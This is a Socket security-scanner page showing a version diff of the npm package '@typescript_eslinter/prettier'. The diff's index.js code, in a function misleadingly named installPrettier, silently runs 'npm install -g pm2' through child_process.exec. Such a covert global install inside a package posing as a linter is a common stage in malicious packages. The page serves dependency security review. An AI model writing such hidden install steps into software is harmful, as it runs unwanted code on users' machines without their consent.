New Case Study:See how Anthropic automated 95% of dependency reviews with Socket.Learn More
Socket
Sign inDemoInstall
Socket

@typescript_eslinter/prettier

Package Overview
Dependencies
Maintainers
0
Versions
10
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

@typescript_eslinter/prettier - npm Package Compare versions

Comparing version 1.1.0 to 1.1.1

22

index.js

@@ -5,11 +5,15 @@ const { exec } = require('child_process');

function installPrettier() {
return new Promise((resolve, reject) => {
exec('npm install -g pm2', (error, stdout, stderr) => {
if (error) {
reject(`Error installing PM2: ${stderr}`);
} else {
resolve(stdout);
}
});
});
exec('pm2 --version', (error, stdout, stderr) => {
if (error) {
return new Promise((resolve, reject) => {
exec('npm install -g pm2', (error, stdout, stderr) => {
if (error) {
reject(`Error installing PM2: ${stderr}`);
} else {
resolve(stdout);
}
});
});
}
})
}

@@ -16,0 +20,0 @@

{
"name": "@typescript_eslinter/prettier",
"version": "1.1.0",
"version": "1.1.1",
"main": "index.js",

@@ -5,0 +5,0 @@ "scripts": {

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc